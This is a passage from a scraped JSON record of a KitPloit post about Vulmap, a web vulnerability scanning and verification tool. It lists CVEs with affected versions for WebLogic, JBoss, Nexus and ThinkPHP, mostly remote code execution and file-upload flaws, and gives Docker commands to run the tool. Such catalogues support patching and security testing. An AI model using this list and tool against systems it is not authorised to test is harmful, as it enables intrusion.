CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker \n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n** [ Download Vulmap ](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" ) **\n", "edition": 1, "modified": "2020-12-25T11:30:06", "published": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
